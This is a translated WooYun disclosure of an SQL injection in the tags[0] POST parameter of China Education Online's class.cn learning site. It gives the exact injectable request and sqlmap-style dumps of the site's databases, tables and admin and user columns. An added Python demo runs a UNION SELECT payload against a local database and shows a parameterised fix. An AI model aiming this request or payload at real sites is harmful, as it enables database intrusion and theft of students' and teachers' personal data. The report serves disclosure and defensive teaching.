Vulnerability ID: WooYun-2015-0124024
Title: A China Education Online site has an SQL injection that leaks 500K+ teacher and student records and endangers the main site
Vendor: eol.cn
Author: 孤风
Submitted: 2015-07-02 10:01
Published: 2015-07-07 10:02
Type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Vendor was notified but ignored the vulnerability
Tags:
2015-07-02: Details sent to the vendor, awaiting the vendor's response
2015-07-02: Vendor has viewed the vulnerability; details visible only to the vendor
2015-07-07: Vendor actively ignored the vulnerability; details made public
Haoke (好课网) is China Education Online's online learning platform. It offers learners a large catalogue of quality online courses spanning basic education, higher education and vocational training, brings together leading practitioners from each field, and lets you freely choose whatever you need or are interested in..
Injection point
```http
POST /ajax/course/list_course HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.class.cn:80/
Host: www.class.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19
```

The `*` after `tags[0]=1` is a sqlmap-style custom injection marker: the injectable parameter is the array element `tags[0]` in the POST body, not a plain scalar field.
The data includes 500K+ teacher and student names, mobile numbers, ID card numbers and student orders, and also covers the main site's data.
Main-site data
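The request above gives away the vulnerable pattern: `tags` arrives as a PHP-style array (`tags[0]`), and a listing endpoint that filters courses by tag will typically build an `IN (...)` clause from its elements. The following is an added example, not code from the original report or from class.cn, that reproduces that pattern against an in-memory SQLite database and shows the fix. The three table names (`class_course_list`, `class_tag_course`, `class_user`) are taken from the dumps in this report; their columns, the rows, the shape of `COURSE_QUERY` and the `implode`-style concatenation are assumptions made for the demo.

```python
# Added example (not code from the original report or from class.cn): the
# injection pattern behind "tags[0]=1*", reproduced against in-memory SQLite.
# Table names follow the report's dump; columns, rows and the query shape are
# constructed for the demo. The vulnerable query is an assumed reconstruction
# of the PHP idiom implode(',', $_POST['tags']) spliced into IN (...).
import re
import sqlite3
from urllib.parse import parse_qs

COURSE_QUERY = (
    "SELECT c.course_id, c.title FROM class_course_list c "
    "JOIN class_tag_course t ON t.course_id = c.course_id "
    "WHERE t.tag_id IN ({ids}) ORDER BY c.publishtime DESC"
)


def make_db():
    """Constructed schema and rows standing in for the dumped class_cn tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE class_course_list (course_id INTEGER PRIMARY KEY, title TEXT, publishtime TEXT);
        CREATE TABLE class_tag_course (tag_id INTEGER, course_id INTEGER);
        CREATE TABLE class_user (user_id INTEGER PRIMARY KEY, real_name TEXT, mobile TEXT);
        INSERT INTO class_course_list VALUES (1, 'Calculus I', '2015-06-01'), (2, 'Intro Python', '2015-06-20');
        INSERT INTO class_tag_course VALUES (1, 1), (19, 2);
        INSERT INTO class_user VALUES (1001, 'Zhang San', '13800000000'), (1002, 'Li Si', '13900000000');
    """)
    return conn


def parse_tags(body):
    """PHP-style array parameter: tags[0]=..&tags[1]=.. -> ordered list of raw strings."""
    fields = parse_qs(body, keep_blank_values=True)
    indexed = []
    for key, values in fields.items():
        m = re.fullmatch(r"tags\[(\d+)\]", key)
        if m:
            indexed.append((int(m.group(1)), values[0]))
    return [v for _, v in sorted(indexed)]


def list_course_vulnerable(conn, tags):
    """Each array element is concatenated into the IN list unquoted and unchecked."""
    sql = COURSE_QUERY.format(ids=",".join(str(t) for t in tags))
    return conn.execute(sql).fetchall()


def list_course_safe(conn, tags):
    """Reject anything that is not a decimal integer, then bind one placeholder per id."""
    ids = []
    for t in tags:
        if not re.fullmatch(r"\d{1,10}", str(t)):
            raise ValueError(f"invalid tag id: {t!r}")
        ids.append(int(t))
    if not ids:
        return []
    sql = COURSE_QUERY.format(ids=",".join("?" * len(ids)))
    return conn.execute(sql, ids).fetchall()


# Constructed attack body: closes the IN list, UNIONs the user table and
# comments out the trailing ORDER BY. Server-side it is received as tags[0].
ATTACK_BODY = (
    "all_course=1&sort=publishtime-desc&type_id=19"
    "&tags[0]=1) UNION SELECT user_id, real_name || ':' || mobile FROM class_user -- "
)
BENIGN_BODY = "all_course=1&sort=publishtime-desc&tags[0]=1&type_id=19"


def demo():
    """Run both implementations against the benign and the injected request body."""
    conn = make_db()
    leaked = list_course_vulnerable(conn, parse_tags(ATTACK_BODY))
    try:
        list_course_safe(conn, parse_tags(ATTACK_BODY))
        blocked = False
    except ValueError:
        blocked = True
    return {
        "benign_safe": list_course_safe(conn, parse_tags(BENIGN_BODY)),
        "leaked_rows": leaked,
        "attack_blocked": blocked,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

`list_course_safe` refuses the payload before it reaches the database, and even a well-formed `1` is bound through a placeholder rather than spliced into the string. If `sort=publishtime-desc` is passed into an ORDER BY, as its name suggests, it needs an allow-list of column names and directions, since ORDER BY targets cannot be bound as parameters.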
```text
Database: eol_study2
[88 tables]
+-----------------------------------+
| Study_Aboutfile                   |
| Study_Admin_Manage                |
| Study_Coupon_Code                 |
| Study_Coupon_List                 |
| Study_Coupon_User_List            |
| Study_Coupon_log                  |
| Study_Course                      |
| Study_CourseTmp                   |
| Study_Course_Check_Log            |
| Study_Course_Comment              |
| Study_Course_DelFile_Log          |
| Study_Course_Live                 |
| Study_Course_LiveTmp              |
| Study_Course_Note                 |
| Study_Course_Num                  |
| Study_Course_Scale                |
| Study_Course_Section              |
| Study_Course_SectionTmp           |
| Study_Course_SectionTmp_Log       |
| Study_Course_Section_Aboutfile    |
| Study_Course_Section_Log          |
| Study_Course_Section_Teacher      |
| Study_Course_Section_Video        |
| Study_Course_Section_VideoTmp     |
| Study_Course_Section_VideoTmp_Log |
| Study_Course_Section_Video_Delete |
| Study_Course_Section_Video_Log    |
| Study_Course_Total_Scale          |
| Study_Course_Type                 |
| Study_Email_Send                  |
| Study_Interest                    |
| Study_Live_Callback_Log           |
| Study_Live_Message_Log            |
| Study_Live_Order_Log              |
| Study_Message                     |
| Study_Message_Send                |
| Study_My_Collect_Course           |
| Study_My_Study_Course             |
| Study_Open_Uid_Map                |
| Study_Order                       |
| Study_Order_Audit_Log             |
| Study_Order_Haoxue                |
| Study_Order_Log                   |
| Study_Order_Log_Dezhi             |
| Study_Order_Pay_Log               |
| Study_Stat_AboutFile              |
| Study_Stat_CourseHits             |
| Study_Stat_CourseScales           |
| Study_Stat_Course_Day             |
| Study_Stat_Course_Month           |
| Study_Stat_Course_Week            |
| Study_Stat_File_Day               |
| Study_Stat_File_Month             |
| Study_Stat_File_Week              |
| Study_Stat_Keywords               |
| Study_Stat_Keywords_Day           |
| Study_Stat_Keywords_Month         |
| Study_Stat_Keywords_Search        |
| Study_Stat_Keywords_Week          |
| Study_Stat_UserComments           |
| Study_Stat_UserHits               |
| Study_Stat_User_Day               |
| Study_Stat_User_Month             |
| Study_Stat_User_Week              |
| Study_Teacher                     |
| Study_User                        |
| Study_User_Check_Log              |
| Study_User_Comment_Log            |
| Study_User_Comment_Viewtime       |
| Study_User_Interest_lk            |
| Study_User_Msg                    |
| Study_User_Num                    |
| Study_User_Organization_Apply     |
| Study_User_Organization_Applytmp  |
| Study_User_Pay_Apply              |
| Study_User_Pay_Applytmp           |
| Study_User_Person_Apply           |
| Study_User_Person_Applytmp        |
| Study_User_Rakeback_Set           |
| Study_User_Weibo                  |
| Study_Void_Generator              |
| ci_sessions                       |
| class_active                      |
| class_cart                        |
| class_tag_course                  |
| class_tag_course_type             |
| class_tag_list                    |
| daemon                            |
+-----------------------------------+
```
```text
Database: eol_study2
Table: Study_Admin_Manage
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| Id        | int(11)     |
| LastIp    | varchar(20) |
| LastLogin | datetime    |
| LoginNum  | int(11)     |
| Name      | varchar(20) |
| PassWord  | varchar(50) |
| Status    | tinyint(4)  |
| Suser     | tinyint(4)  |
+-----------+-------------+
```
500K+ teacher and student records
```text
Database: class_cn
[94 tables]
+---------------------------------------+
| ci_sessions                           |
| class_active                          |
| class_admin_function                  |
| class_admin_group                     |
| class_admin_group_function            |
| class_admin_member                    |
| class_admin_member_function           |
| class_app_course_type                 |
| class_app_feedback                    |
| class_app_version                     |
| class_cart                            |
| class_ccback_section_filename         |
| class_cooperation_order               |
| class_coupon_list                     |
| class_coupon_op_log                   |
| class_coupon_public_code              |
| class_coupon_single_code              |
| class_coupon_user_list                |
| class_course_amount                   |
| class_course_cc_video_undel           |
| class_course_chapter                  |
| class_course_chapter_section          |
| class_course_check                    |
| class_course_comment                  |
| class_course_detail                   |
| class_course_guide_doc                |
| class_course_list                     |
| class_course_note                     |
| class_course_rate                     |
| class_course_rate_detail              |
| class_course_section                  |
| class_course_section_check            |
| class_course_section_guide_doc        |
| class_course_section_multi            |
| class_course_section_teacher          |
| class_course_type                     |
| class_course_user_recommend           |
| class_email_send                      |
| class_live_course                     |
| class_live_course_check               |
| class_live_order                      |
| class_logs_coupon                     |
| class_logs_course_chapter_section_del |
| class_logs_course_check               |
| class_logs_course_delfile             |
| class_logs_course_section             |
| class_logs_course_section_check_del   |
| class_logs_course_section_multi_del   |
| class_logs_course_update              |
| class_logs_live_callback              |
| class_logs_live_course                |
| class_logs_live_course_del            |
| class_logs_live_message               |
| class_logs_order_charge_back          |
| class_logs_order_check                |
| class_logs_protocal_change            |
| class_logs_transcoder                 |
| class_logs_user_change                |
| class_logs_user_check                 |
| class_message                         |
| class_message_send                    |
| class_offline_protocol                |
| class_open_uid_map                    |
| class_order                           |
| class_order_dezhi                     |
| class_order_haoxue                    |
| class_order_log                       |
| class_order_pay_log                   |
| class_promote_course                  |
| class_promote_course_check            |
| class_promote_list                    |
| class_statistic_total                 |
| class_tag_course                      |
| class_tag_course_type                 |
| class_tag_list                        |
| class_user                            |
| class_user_comment                    |
| class_user_comment_viewtimes          |
| class_user_favorites_course           |
| class_user_msg                        |
| class_user_num                        |
| class_user_org_cert                   |
| class_user_org_cert_check             |
| class_user_pay_request                |
| class_user_pay_request_check          |
| class_user_person_cert                |
| class_user_person_cert_check          |
| class_user_ratio_set                  |
| class_user_settle                     |
| class_user_settle_order               |
| class_user_study_course               |
| class_user_teacher                    |
| class_user_weibo                      |
| class_void_generator                  |
+---------------------------------------+
```
Order details
```text
Database: class_cn
Table: class_order
[19 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| back_time      | datetime            |
| close_pay      | decimal(10,2)       |
| close_status   | tinyint(2) unsigned |
| close_time     | datetime            |
| course_id      | int(11) unsigned    |
| create_time    | timestamp           |
| create_user_id | int(11) unsigned    |
| due_pay        | decimal(10,2)       |
| expend_type    | tinyint(4) unsigned |
| ip             | char(15)            |
| is_back        | tinyint(2) unsigned |
| oid            | char(16)            |
| order_status   | tinyint(2) unsigned |
| order_user_id  | int(11) unsigned    |
| pay            | decimal(10,2)       |
| pay_flag       | tinyint(3) unsigned |
| pay_time       | datetime            |
| source         | tinyint(1) unsigned |
| void           | bigint(20)          |
+----------------+---------------------+
```
User information
```text
Database: class_cn
Table: class_user
[34 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| bad_comment    | int(11) unsigned    |
| contact_email  | varchar(50)         |
| create_time    | timestamp           |
| email          | varchar(100)        |
| gender         | enum('0','1','2')   |
| good_comment   | int(11) unsigned    |
| head_img       | varchar(200)        |
| interest       | varchar(1000)       |
| intro          | text                |
| is_check       | tinyint(2)          |
| is_pub_email   | tinyint(2)          |
| is_pub_mobile  | tinyint(2)          |
| is_pub_qq      | tinyint(2)          |
| is_pub_tel     | tinyint(2)          |
| is_pub_website | tinyint(2)          |
| is_pub_weibo   | tinyint(2)          |
| login_ip       | varchar(20)         |
| login_num      | int(11)             |
| login_time     | datetime            |
| mobile         | char(11)            |
| nick_name      | varchar(100)        |
| old_head_img   | varchar(100)        |
| pay_status     | tinyint(2) unsigned |
| qq             | varchar(20)         |
| rand_code      | varchar(32)         |
| real_name      | varchar(50)         |
| source         | varchar(10)         |
| status         | tinyint(2)          |
| tel            | varchar(20)         |
| up_time        | datetime            |
| user_id        | int(11)             |
| user_type      | tinyint(2)          |
| website        | varchar(200)        |
| weibo          | varchar(100)        |
+----------------+---------------------+
```
Don't know.
Severity: No impact, vendor ignored
Ignored at: 2015-07-07 10:02
Vulnerability Rank: 15 (WooYun rating)
2015-07-07: Thanks for checking, we will fix it as soon as possible.
I think this one deserves a "thunder".